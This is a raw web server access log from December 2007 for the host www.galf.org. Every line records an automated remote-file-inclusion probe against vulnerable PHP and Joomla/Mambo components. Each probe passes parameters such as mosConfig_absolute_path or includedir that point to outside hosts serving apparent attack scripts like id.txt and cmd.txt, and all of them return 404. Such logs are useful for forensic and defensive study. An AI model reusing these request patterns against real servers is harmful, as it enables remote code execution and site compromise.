213.178.2.45 - - [16/Dec/2007:16:12:06 -0800] "GET /logs/access_070827.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:12:07 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:12:08 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:12:08 -0800] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:12:14 -0800] "GET /logs/access_070827.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:12:15 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800"
213.178.2.45 - - [16/Dec/2007:16:12:15 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:12:16 -0800] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:12:36 -0800] "GET /logs/access.log///components/com_extended_registration/registration_detailed.inc.php?=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:12:36 -0800] "GET ///components/com_extended_registration/registration_detailed.inc.php?=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:12:36 -0800] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:12:38 -0800] "GET /logs/access.log///components/com_extended_registration/registration_detailed.inc.php?=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:12:38 -0800] "GET ///components/com_extended_registration/registration_detailed.inc.php?=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.238.198.71 - - [16/Dec/2007:16:12:38 -0800] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:12:49 -0800] "GET /logs/access.log///components/com_extended_registration/registration_detailed.inc.php?=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:12:49 -0800] "GET ///components/com_extended_registration/registration_detailed.inc.php?=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:12:49 -0800] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.140.234.80 - - [16/Dec/2007:16:13:04 -0800] "GET /logs/access_070806.log/index.php?pagina=http://www.leminvpk.net/news/news/mc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
70.169.155.140 - - [16/Dec/2007:16:13:21 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://zoolandia.t35.com/cs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
70.169.155.140 - - [16/Dec/2007:16:13:32 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://zoolandia.t35.com/cs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:13:38 -0800] "GET /logs/access_070820.log///components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:13:38 -0800] "GET /logs/access_070820.log///components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:13:39 -0800] "GET /logs/access_070820.log///components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
70.169.155.140 - - [16/Dec/2007:16:13:46 -0800] "GET /logs/access_071105.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://zoolandia.t35.com/cs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
70.169.155.140 - - [16/Dec/2007:16:13:46 -0800] "GET /logs/access_071029.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://zoolandia.t35.com/cs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
213.157.188.68 - - [16/Dec/2007:16:13:48 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
213.157.188.68 - - [16/Dec/2007:16:13:49 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
67.15.153.63 - - [16/Dec/2007:16:14:41 -0800] "GET /logs/access_071203.log/send_reminders.php?includedir=www.myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.15.153.63 - - [16/Dec/2007:16:14:42 -0800] "GET /send_reminders.php?includedir=www.myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.15.153.63 - - [16/Dec/2007:16:14:42 -0800] "GET /logs/send_reminders.php?includedir=www.myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.15.153.63 - - [16/Dec/2007:16:14:45 -0800] "GET /logs/access_071203.log/send_reminders.php?includedir=www.myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.15.153.63 - - [16/Dec/2007:16:14:46 -0800] "GET /send_reminders.php?includedir=www.myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.15.153.63 - - [16/Dec/2007:16:14:46 -0800] "GET /logs/send_reminders.php?includedir=www.myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:14:53 -0800] "GET /logs/access_071015.log///components/com_extended_registration/registration_detailed.inc.php?=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:15:07 -0800] "GET /logs/access_071015.log///components/com_extended_registration/registration_detailed.inc.php?=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:15:07 -0800] "GET /logs/access_071015.log///components/com_extended_registration/registration_detailed.inc.php?=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:15:51 -0800] "GET /logs/access_071028.log///components/com_extended_registration/registration_detailed.inc.php?=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.67.210.218 - - [16/Dec/2007:16:15:52 -0800] "GET /logs/access_070723.log/index.php?pagina=http://www.lolzz.kit.net/scan/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.67.210.218 - - [16/Dec/2007:16:15:52 -0800] "GET /logs/index.php?pagina=http://www.lolzz.kit.net/scan/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.246.51 - - [16/Dec/2007:16:15:57 -0800] "GET /logs/access_071105.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.44.246.51 - - [16/Dec/2007:16:15:57 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.44.246.51 - - [16/Dec/2007:16:15:57 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.44.246.51 - - [16/Dec/2007:16:15:57 -0800] "GET /logs/access_071029.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
87.238.198.71 - - [16/Dec/2007:16:16:00 -0800] "GET /logs/access_071028.log///components/com_extended_registration/registration_detailed.inc.php?=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.101.4.49 - - [16/Dec/2007:16:16:00 -0800] "GET /logs/access_070910.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:16:40 -0800] "GET /logs/access_071028.log///components/com_extended_registration/registration_detailed.inc.php?=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
207.44.246.51 - - [16/Dec/2007:16:16:51 -0800] "GET /logs/access_071203.log/send_reminders.php?includedir=http://myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.44.246.51 - - [16/Dec/2007:16:16:51 -0800] "GET /send_reminders.php?includedir=http://myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.44.246.51 - - [16/Dec/2007:16:16:52 -0800] "GET /logs/send_reminders.php?includedir=http://myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
207.44.246.51 - - [16/Dec/2007:16:16:52 -0800] "GET /logs/access_071203.log/send_reminders.php?includedir=http://myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.44.246.51 - - [16/Dec/2007:16:16:52 -0800] "GET /send_reminders.php?includedir=http://myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.44.246.51 - - [16/Dec/2007:16:16:52 -0800] "GET /logs/send_reminders.php?includedir=http://myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
80.172.224.21 - - [16/Dec/2007:16:17:05 -0800] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://pyskaty.za.pl/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.172.224.21 - - [16/Dec/2007:16:17:05 -0800] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://pyskaty.za.pl/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.68.208.203 - - [16/Dec/2007:16:17:13 -0800] "GET /logs/access_070716.log/index2.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.68.208.203 - - [16/Dec/2007:16:17:14 -0800] "GET /index2.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.15.188.4 - - [16/Dec/2007:16:17:57 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://pyskaty.za.pl/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.15.188.4 - - [16/Dec/2007:16:17:57 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://pyskaty.za.pl/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.15.153.63 - - [16/Dec/2007:16:17:58 -0800] "GET /logs/access_071119.log/send_reminders.php?includedir=www.myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
67.15.153.63 - - [16/Dec/2007:16:17:58 -0800] "GET /logs/access_071119.log/send_reminders.php?includedir=www.myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.157.188.68 - - [16/Dec/2007:16:18:06 -0800] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
213.157.188.68 - - [16/Dec/2007:16:18:06 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
213.157.188.68 - - [16/Dec/2007:16:18:07 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
213.157.188.68 - - [16/Dec/2007:16:18:20 -0800] "GET /logs/access_070827.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
67.15.153.63 - - [16/Dec/2007:16:18:25 -0800] "GET /logs/access_071028.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=www.myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
67.15.153.63 - - [16/Dec/2007:16:18:25 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=www.myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
67.15.153.63 - - [16/Dec/2007:16:18:25 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=www.myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
67.15.153.63 - - [16/Dec/2007:16:18:26 -0800] "GET /logs/access_071028.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=www.myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.15.153.63 - - [16/Dec/2007:16:18:26 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=www.myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.15.153.63 - - [16/Dec/2007:16:18:26 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=www.myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.15.153.63 - - [16/Dec/2007:16:18:58 -0800] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=www.myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.15.153.63 - - [16/Dec/2007:16:18:58 -0800] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=www.myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.67.210.218 - - [16/Dec/2007:16:18:59 -0800] "GET /logs/access_070806.log/index.php?pagina=http://www.lolzz.kit.net/scan/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.192.58 - - [16/Dec/2007:16:19:01 -0800] "GET /logs/access_070716.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.192.58 - - [16/Dec/2007:16:19:02 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.192.58 - - [16/Dec/2007:16:19:02 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.164.133.203 - - [16/Dec/2007:16:19:06 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.webmasterserve.com/impex/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.44.246.51 - - [16/Dec/2007:16:19:15 -0800] "GET /logs/access_071105.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.44.246.51 - - [16/Dec/2007:16:19:15 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.44.246.51 - - [16/Dec/2007:16:19:16 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.44.246.51 - - [16/Dec/2007:16:19:16 -0800] "GET /logs/access_071029.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.172.49.109 - - [16/Dec/2007:16:19:18 -0800] "GET /logs/access_070910.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://adm-adserver.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.242.75.179 - - [16/Dec/2007:16:19:19 -0800] "GET /logs/access_071029.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
87.242.75.179 - - [16/Dec/2007:16:19:19 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.242.75.179 - - [16/Dec/2007:16:19:19 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.193.192.58 - - [16/Dec/2007:16:19:19 -0800] "GET /logs/access_070618.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.140.35 - - [16/Dec/2007:16:19:23 -0800] "GET /logs/announcements.php?phpraid_dir=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
85.25.140.35 - - [16/Dec/2007:16:19:23 -0800] "GET /announcements.php?phpraid_dir=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
209.172.49.109 - - [16/Dec/2007:16:19:36 -0800] "GET /logs/access_070716.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://adm-adserver.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.44.246.51 - - [16/Dec/2007:16:19:41 -0800] "GET /logs/access_071119.log/send_reminders.php?includedir=http://myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.235.219.116 - - [16/Dec/2007:16:19:41 -0800] "GET /logs/access_071203.log/inc/cmses/aedating4CMS.php?dir[inc]=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.235.219.116 - - [16/Dec/2007:16:19:42 -0800] "GET /inc/cmses/aedating4CMS.php?dir[inc]=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.235.219.116 - - [16/Dec/2007:16:19:42 -0800] "GET /logs/inc/cmses/aedating4CMS.php?dir[inc]=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.44.246.51 - - [16/Dec/2007:16:19:47 -0800] "GET /logs/access_071119.log/send_reminders.php?includedir=http://myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:19:57 -0800] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
209.172.49.109 - - [16/Dec/2007:16:19:58 -0800] "GET /logs/access_071001.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://adm-adserver.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:19:58 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:19:59 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:20:01 -0800] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
87.242.75.179 - - [16/Dec/2007:16:20:03 -0800] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.242.75.179 - - [16/Dec/2007:16:20:04 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:20:04 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
87.242.75.179 - - [16/Dec/2007:16:20:04 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:20:08 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
